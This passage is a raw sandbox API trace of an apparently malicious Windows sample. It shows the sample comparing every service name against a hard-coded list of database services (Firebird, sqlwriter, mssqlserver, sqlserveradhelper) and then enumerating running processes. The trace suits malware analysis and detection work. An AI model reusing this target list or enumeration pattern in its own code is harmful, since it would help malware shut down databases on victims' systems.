(lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0046.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0046.612] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0046.612] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0046.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0046.612] lstrlenW (lpString="NlaSvc") returned 6 [0046.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0046.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0046.612] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0046.612] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0046.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0046.612] lstrlenW (lpString="nsi") returned 3 [0046.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0046.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0046.612] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0046.612] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0046.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0046.612] lstrlenW (lpString="PcaSvc") returned 6 [0046.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0046.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0046.612] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0046.612] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0046.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0046.612] lstrlenW (lpString="PlugPlay") returned 8 [0046.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0046.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0046.613] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0046.613] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0046.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0046.613] lstrlenW (lpString="Power") returned 5 [0046.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0046.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0046.613] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0046.613] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0046.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0046.613] lstrlenW (lpString="ProfSvc") returned 7 [0046.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0046.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0046.613] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0046.613] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0046.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0046.613] lstrlenW (lpString="RpcEptMapper") returned 12 [0046.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.613] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0046.613] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0046.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0046.613] lstrlenW (lpString="RpcSs") returned 5 [0046.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0046.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0046.613] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0046.613] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0046.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0046.613] lstrlenW (lpString="SamSs") returned 5 [0046.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0046.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0046.614] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0046.614] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0046.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0046.614] lstrlenW (lpString="Schedule") returned 8 [0046.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0046.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0046.614] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0046.614] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0046.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0046.614] lstrlenW (lpString="SecurityHealthService") returned 21 [0046.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0046.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0046.614] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0046.614] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0046.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0046.614] lstrlenW (lpString="SENS") returned 4 [0046.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0046.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0046.614] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0046.614] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0046.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0046.614] lstrlenW (lpString="ShellHWDetection") returned 16 [0046.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.614] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0046.614] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0046.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0046.615] lstrlenW (lpString="Spooler") returned 7 [0046.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0046.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0046.615] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0046.615] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0046.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0046.615] lstrlenW (lpString="SSDPSRV") returned 7 [0046.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0046.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0046.615] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0046.615] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0046.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0046.615] lstrlenW (lpString="StateRepository") returned 15 [0046.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0046.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0046.615] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0046.615] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0046.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0046.615] lstrlenW (lpString="SysMain") returned 7 [0046.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0046.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0046.615] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0046.615] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0046.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0046.615] lstrlenW (lpString="SystemEventsBroker") returned 18 [0046.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0046.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0046.615] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0046.615] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0046.615] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6358f0 | out: hHeap=0x5d0000) returned 1 [0046.615] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2fc [0047.176] Process32FirstW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0047.177] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0047.178] lstrlenW (lpString="System") returned 6 [0047.178] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0047.179] lstrlenW (lpString="smss.exe") returned 8 [0047.179] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0047.180] lstrlenW (lpString="csrss.exe") returned 9 [0047.180] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0047.181] lstrlenW (lpString="wininit.exe") returned 11 [0047.181] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0047.181] lstrlenW (lpString="csrss.exe") returned 9 [0047.182] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0047.183] lstrlenW (lpString="winlogon.exe") returned 12 [0047.183] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0047.184] lstrlenW (lpString="services.exe") returned 12 [0047.184] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0047.185] lstrlenW (lpString="lsass.exe") returned 9 [0047.185] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.185] lstrlenW (lpString="svchost.exe") returned 11 [0047.185] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0047.186] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0047.186] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0047.187] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0047.187] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.188] lstrlenW (lpString="svchost.exe") returned 11 [0047.188] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0047.189] lstrlenW (lpString="dwm.exe") returned 7 [0047.189] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.190] lstrlenW (lpString="svchost.exe") returned 11 [0047.190] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.191] lstrlenW (lpString="svchost.exe") returned 11 [0047.191] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.192] lstrlenW (lpString="svchost.exe") returned 11 [0047.192] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.192] lstrlenW (lpString="svchost.exe") returned 11 [0047.193] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.193] lstrlenW (lpString="svchost.exe") returned 11 [0047.193] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.194] lstrlenW (lpString="svchost.exe") returned 11 [0047.194] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.195] lstrlenW (lpString="svchost.exe") returned 11 [0047.195] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.196] lstrlenW (lpString="svchost.exe") returned 11 [0047.196] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.197] lstrlenW (lpString="svchost.exe") returned 11 [0047.197] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0047.198] lstrlenW (lpString="spoolsv.exe") returned 11 [0047.198] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.317] lstrlenW (lpString="svchost.exe") returned 11 [0047.317] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.318] lstrlenW (lpString="svchost.exe") returned 11 [0047.318] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0047.319] lstrlenW (lpString="audiodg.exe") returned 11 [0047.319] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0047.320] lstrlenW (lpString="sihost.exe") returned 10 [0047.320] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.321] lstrlenW (lpString="svchost.exe") returned 11 [0047.321] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0047.321] lstrlenW (lpString="taskhostw.exe") returned 13 [0047.321] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0047.322] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0047.322] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0047.323] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0047.323] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0047.324] lstrlenW (lpString="explorer.exe") returned 12 [0047.324] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0047.325] lstrlenW (lpString="Memory Compression") returned 18 [0047.325] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0047.893] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0047.893] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0047.894] lstrlenW (lpString="SearchUI.exe") returned 12 [0047.894] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0047.895] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0047.895] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0047.896] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0047.896] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0047.897] lstrlenW (lpString="taskhostw.exe") returned 13 [0047.897] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0047.898] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0047.898] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0047.899] lstrlenW (lpString="UsoClient.exe") returned 13 [0047.899] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0047.899] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0047.899] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0047.900] lstrlenW (lpString="taskhostw.exe") returned 13 [0047.900] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0047.902] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0047.902] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0047.902] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0047.903] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0047.903] lstrlenW (lpString="msoia.exe") returned 9 [0047.903] Process32NextW (in: hSnapshot=0x2fc, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0047.904] 